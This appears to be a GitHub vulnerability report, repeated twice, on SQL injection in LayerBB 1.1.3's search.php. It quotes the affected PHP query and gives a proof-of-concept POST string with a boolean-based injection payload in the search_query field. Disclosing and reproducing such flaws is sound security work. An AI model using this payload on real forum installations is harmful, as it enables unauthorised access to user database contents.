LayerBB 1.1.3 has SQL Injection via the search.php search_query parameter.
Steps to Reproduce Issue
in search.php 86-91 if ((isset($_POST['user_search']) && isset($_POST['search_type'])) || !isset($_POST['search_type'])) { $MYSQL->bind('search_query', $search_query); $query = $MYSQL->query("SELECT * FROM {prefix}users WHERE username LIKE CONCAT('%',:search_query,'%');");
Unfiltered search_query results in SQL injection POC
Packet parameters search_query=admin' RLIKE (SELECT (CASE WHEN (5268=5268) THEN 0x61646d696e ELSE 0x28 END)) AND 'GdPB'='GdPB&time_from=1996&time_to=2019&user_search=on&search_type=advanced&search_submit=Search
Server Environment (PHP, MySQL, Apache Version and Operating System):
version 1.1.3
The text was updated successfully, but these errors were encountered:
LayerBB 1.1.3 has SQL Injection via the search.php search_query parameter.
Steps to Reproduce Issue
in search.php 86-91
if ((isset($_POST['user_search']) && isset($_POST['search_type'])) || !isset($_POST['search_type'])) { $MYSQL->bind('search_query', $search_query); $query = $MYSQL->query("SELECT * FROM {prefix}users WHERE username LIKE CONCAT('%',:search_query,'%');");Unfiltered search_query results in SQL injection
POC
Packet parameters
search_query=admin' RLIKE (SELECT (CASE WHEN (5268=5268) THEN 0x61646d696e ELSE 0x28 END)) AND 'GdPB'='GdPB&time_from=1996&time_to=2019&user_search=on&search_type=advanced&search_submit=SearchServer Environment (PHP, MySQL, Apache Version and Operating System):
version 1.1.3
The text was updated successfully, but these errors were encountered: